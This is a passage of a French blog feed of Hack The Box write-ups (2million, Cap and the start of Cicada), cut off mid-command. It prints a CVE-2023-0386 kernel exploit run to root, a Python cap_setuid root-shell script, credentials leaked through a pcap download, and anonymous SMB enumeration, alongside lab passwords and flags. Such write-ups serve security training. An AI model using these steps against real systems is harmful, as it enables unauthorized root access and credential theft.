</span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat /var/mail/admin </span></span><span class="line"><span class="cl">From: ch4p &lt;ch4p@2million.htb&gt; </span></span><span class="line"><span class="cl">To: admin &lt;admin@2million.htb&gt; </span></span><span class="line"><span class="cl">Cc: g0blin &lt;g0blin@2million.htb&gt; </span></span><span class="line"><span class="cl">Subject: Urgent: Patch System OS </span></span><span class="line"><span class="cl">Date: Tue, <span class="m">1</span> June <span class="m">2023</span> 10:45:22 -0700 </span></span><span class="line"><span class="cl">Message-ID: &lt;9876543210@2million.htb&gt; </span></span><span class="line"><span class="cl">X-Mailer: ThunderMail Pro 5.2 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Hey admin, </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">I<span class="s1">&#39;m know you&#39;</span>re working as fast as you can to <span class="k">do</span> the DB migration. While we<span class="s1">&#39;re partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can&#39;</span>t get popped by that. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTB Godfather </span></span></code></pre></td></tr></table> </div> </div><h3 id="cve-2023-0386--kernel-exploit">CVE-2023-0386 : Kernel Exploit </h3><p>Sur internet, on trouve la <code>CVE-2023-0386</code> avec un repo github</p> <blockquote> <p><a class="link" href="https://github.com/xkaneiki/CVE-2023-0386/tree/main" target="_blank" rel="noopener" >https://github.com/xkaneiki/CVE-2023-0386/tree/main</a></p> </blockquote> <p>On execute l&rsquo;exploit:</p> <ul> <li>dans un premier terminal on fait:</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ make all </span></span><span class="line"><span class="cl">$ ./fuse ./ovlcap/lower ./gc </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> len of gc: 0x3ee0 </span></span><span class="line"><span class="cl">mkdir: File exists </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> readdir </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> getattr_callback </span></span><span class="line"><span class="cl">/file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> open_callback </span></span><span class="line"><span class="cl">/file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> <span class="nb">read</span> buf callback </span></span><span class="line"><span class="cl">offset <span class="m">0</span> </span></span><span class="line"><span class="cl">size <span class="m">16384</span> </span></span><span class="line"><span class="cl">path /file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> open_callback </span></span><span class="line"><span class="cl">/file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> open_callback </span></span><span class="line"><span class="cl">/file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> ioctl callback </span></span><span class="line"><span class="cl">path /file </span></span><span class="line"><span class="cl">cmd 0x80086601 </span></span></code></pre></td></tr></table> </div> </div><ul> <li>Dans un deuxième terminal, on execute finalement un deuxième binaire pour obtenir les droits root:</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./exp </span></span><span class="line"><span class="cl">uid:1000 gid:1000 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> mount success </span></span><span class="line"><span class="cl">total <span class="m">8</span> </span></span><span class="line"><span class="cl">drwxrwxr-x <span class="m">1</span> root root <span class="m">4096</span> Dec <span class="m">8</span> 12:53 . </span></span><span class="line"><span class="cl">drwxrwxr-x <span class="m">6</span> root root <span class="m">4096</span> Dec <span class="m">8</span> 12:52 .. </span></span><span class="line"><span class="cl">-rwsrwxrwx <span class="m">1</span> nobody nogroup <span class="m">16096</span> Jan <span class="m">1</span> <span class="m">1970</span> file </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> exploit success! </span></span><span class="line"><span class="cl">To run a <span class="nb">command</span> as administrator <span class="o">(</span>user <span class="s2">&#34;root&#34;</span><span class="o">)</span>, use <span class="s2">&#34;sudo &lt;command&gt;&#34;</span>. </span></span><span class="line"><span class="cl">See <span class="s2">&#34;man sudo_root&#34;</span> <span class="k">for</span> details. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@2million:/tmp/t/linux/exploit/CVE-2023-0386# sudo su </span></span><span class="line"><span class="cl">root@2million:/tmp/t/linux/exploit/CVE-2023-0386# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@2million:~# cat root.txt </span></span><span class="line"><span class="cl">7e64.....db13 </span></span></code></pre></td></tr></table> </div> </div><h2 id="cve-2023-0386--explanation">CVE-2023-0386 : Explanation </h2><p>A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.</p> <p>Exploitation :</p> <p>Un attaquant crée un environnement spécifique (par exemple, un container ou un espace utilisateur) pour exploiter une mauvaise gestion des droits dans OverlayFS et exécuter du code malveillant avec les privilèges root.</p>https://leopoldabgn.github.io/writeups/p/cap-htb/Fri, 06 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cap-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Cap cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Cap</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.245</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nathan : Buck3tH4TF0RM3! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- 10.10.10.245 </span></span><span class="line"><span class="cl">Port <span class="m">80</span> : HTTP - http://cap.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="etchosts">/etc/hosts </h3><p>On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu&rsquo;il y a également le nom de domaine: <strong>data.analytical.htb</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## ...</span> </span></span><span class="line"><span class="cl">10.10.10.245 cap.htb </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="snapshot">Snapshot </h3><p>On observe un bouton snapshot qui permet visualiser des fichiers de capture reseau .pcap. On observe l&rsquo;url :</p> <blockquote> <p><a class="link" href="http://cap.htb/data/3" target="_blank" rel="noopener" >http://cap.htb/data/3</a> On peut download via un bouton, sur Burp on observe un appel a l&rsquo;url: <a class="link" href="http://cap.htb/download/3" target="_blank" rel="noopener" >http://cap.htb/download/3</a></p> </blockquote> <p>On download le plus de pcap possible pour les observer, on peut voir que le numéro 0 est intéressant. Dedans, on découvre la capture de packets réseau montrant une connexion ftp avec un user/password en clair:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="m">220</span> <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span> </span></span><span class="line"><span class="cl">USER nathan </span></span><span class="line"><span class="cl"><span class="m">331</span> Please specify the password. </span></span><span class="line"><span class="cl">PASS Buck3tH4TF0RM3! </span></span></code></pre></td></tr></table> </div> </div><h3 id="ftp---user-flag">FTP - user flag </h3><p>On se connecte avec le user nathan et on récupère le flag utilisateur</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ftp cap.htb </span></span><span class="line"><span class="cl">Connected to cap.htb. </span></span><span class="line"><span class="cl"><span class="m">220</span> <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span> </span></span><span class="line"><span class="cl">Name <span class="o">(</span>cap.htb:leopold<span class="o">)</span>: nathan </span></span><span class="line"><span class="cl"><span class="m">331</span> Please specify the password. </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl"><span class="m">230</span> Login successful. </span></span><span class="line"><span class="cl">Remote system <span class="nb">type</span> is UNIX. </span></span><span class="line"><span class="cl">Using binary mode to transfer files. </span></span><span class="line"><span class="cl">ftp&gt; ls </span></span><span class="line"><span class="cl"><span class="m">229</span> Entering Extended Passive Mode <span class="o">(||</span><span class="p">|</span>41519<span class="p">|</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">150</span> Here comes the directory listing. </span></span><span class="line"><span class="cl">-rwxrwxr-x <span class="m">1</span> <span class="m">1001</span> <span class="m">1001</span> <span class="m">46631</span> Dec <span class="m">06</span> 17:17 linenum.sh </span></span><span class="line"><span class="cl">-r-------- <span class="m">1</span> <span class="m">1001</span> <span class="m">1001</span> <span class="m">33</span> Dec <span class="m">06</span> 13:10 user.txt </span></span><span class="line"><span class="cl"><span class="m">226</span> Directory send OK. </span></span><span class="line"><span class="cl">ftp&gt; cat user.txt </span></span><span class="line"><span class="cl">?Invalid command. </span></span><span class="line"><span class="cl">ftp&gt; get user.txt </span></span><span class="line"><span class="cl">local: user.txt remote: user.txt </span></span><span class="line"><span class="cl"><span class="m">229</span> Entering Extended Passive Mode <span class="o">(||</span><span class="p">|</span>44318<span class="p">|</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening BINARY mode data connection <span class="k">for</span> user.txt <span class="o">(</span><span class="m">33</span> bytes<span class="o">)</span>. </span></span><span class="line"><span class="cl">100% <span class="p">|</span>***************************************************************************************************************************************************************<span class="p">|</span> <span class="m">33</span> 608.04 KiB/s 00:00 ETA </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl"><span class="m">33</span> bytes received in 00:00 <span class="o">(</span>0.17 KiB/s<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="linpeas--python-suid---cap_setuid">LinPEAS : Python SUID -&gt; cap_setuid </h3><p>On peut se connecter en ssh avec l&rsquo;utilisateur nathan sur la machine. Ensuite, on trouve une vulnérabilité. Python est autorisé à changer setuid(0) et donc d&rsquo;executer n&rsquo;importe quelle commande en tant que root:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ./linpeas.sh </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Files with capabilities <span class="o">(</span>limited to 50<span class="o">)</span>: </span></span><span class="line"><span class="cl">/usr/bin/python3.8 <span class="o">=</span> cap_setuid,cap_net_bind_service+eip </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nathan@cap:~/a$ vim please_dont_do_this.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">import os </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Changer l&#39;UID en root</span> </span></span><span class="line"><span class="cl">os.setuid<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Lancer un shell interactif avec les privilèges root</span> </span></span><span class="line"><span class="cl">os.system<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nathan@cap:~/a$ python3 please_dont_do_this.py </span></span><span class="line"><span class="cl">root@cap:~/a# </span></span><span class="line"><span class="cl">root@cap:~/a# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@cap:~# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@cap:/root# cat root.txt </span></span><span class="line"><span class="cl">d5d1.....bcf0 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/cicada-htb/Fri, 06 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cicada-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Cicada cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Cicada</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.35</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">michael.wrightson:<span class="sb">`</span>Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8<span class="sb">`</span> </span></span><span class="line"><span class="cl">david.orelious:<span class="sb">`</span>aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3`</span> </span></span><span class="line"><span class="cl">emily.oscars:<span class="sb">`</span>Q!3@Lp#M6b*7t*Vt<span class="sb">`</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap 10.10.11.35 -sV -sC -T4 -Pn </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">53/tcp open domain Simple DNS Plus </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cicada.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2025-08-22T20:24:16 </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cicada.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2025-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl">Service Info: Host: CICADA-DC<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-01T07:50:09 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: 7h00m00s </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb--hr-share">SMB : HR share </h3><p>On vérifie les Share SMB disponible en se connectant de manière anonyme avec la commande:</p> <blockquote> <p>smbclient -N -L //10.10.11.35</p> </blockquote> <p>On obtient les shares suivant:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> DEV Disk </span></span><span class="line"><span class="cl"> HR Disk </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span></code></pre></td></tr></table> </div> </div><p><code>DEV</code> et <code>HR</code> semblent intéressant ! On va donc vérifier si ils sont accessibles de manière anononyme:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## DEV</span> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/DEV -N </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl">NET_STATUS_ACCESS_DENIED </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## HR</span> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/HR -N </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:29:09 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:21:29 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> Notice from HR.txt A <span class="m">1266</span> Wed Aug <span class="m">28</span> 13:31:48 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get <span class="s2">&#34;Notice from HR.txt&#34;</span> </span></span><span class="line"><span class="cl">getting file <span class="se">\N</span>otice from HR.txt of size <span class="m">1266</span> as Notice from HR.txt <span class="o">(</span>6.1 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 6.1 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un fichier avec des credentials, notamment un mot de passe: <code>Cicada$M6Corpb*@Lp#nZp!8</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat Notice<span class="se">\ </span>from<span class="se">\ </span>HR.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear new hire! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to Cicada Corp! We<span class="s1">&#39;re thrilled to have you join our team. As part of our security protocols, it&#39;</span>s essential that you change your default password to something unique and secure. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Your default password is: Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">To change your password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. </span></span><span class="line"><span class="cl">2. Once logged in, navigate to your account settings or profile settings section. </span></span><span class="line"><span class="cl">3. Look <span class="k">for</span> the option to change your password. This will be labeled as <span class="s2">&#34;Change Password&#34;</span>. </span></span><span class="line"><span class="cl">4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. </span></span><span class="line"><span class="cl">5. After changing your password, make sure to save your changes. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Remember, your password is a crucial aspect of keeping your account secure. Please <span class="k">do</span> not share your password with anyone, and ensure you use a complex password. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">If you encounter any issues or need assistance with changing your password, don<span class="err">&#39;</span>t hesitate to reach out to our support team at support@cicada.htb. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Thank you <span class="k">for</span> your attention to this matter, and once again, welcome to the Cicada Corp team! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Best regards, </span></span><span class="line"><span class="cl">Cicada Corp </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-enumeration">User enumeration </h3><p>La prochaine étape est donc de recuperer le nom d&rsquo;utilisateur relié a ce mot de passe. J&rsquo;ai pu tester de très nombreux scripts pour lister les noms d&rsquo;utilisateurs sans avoir de compte. Une seule commande à fonctionné :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -d <span 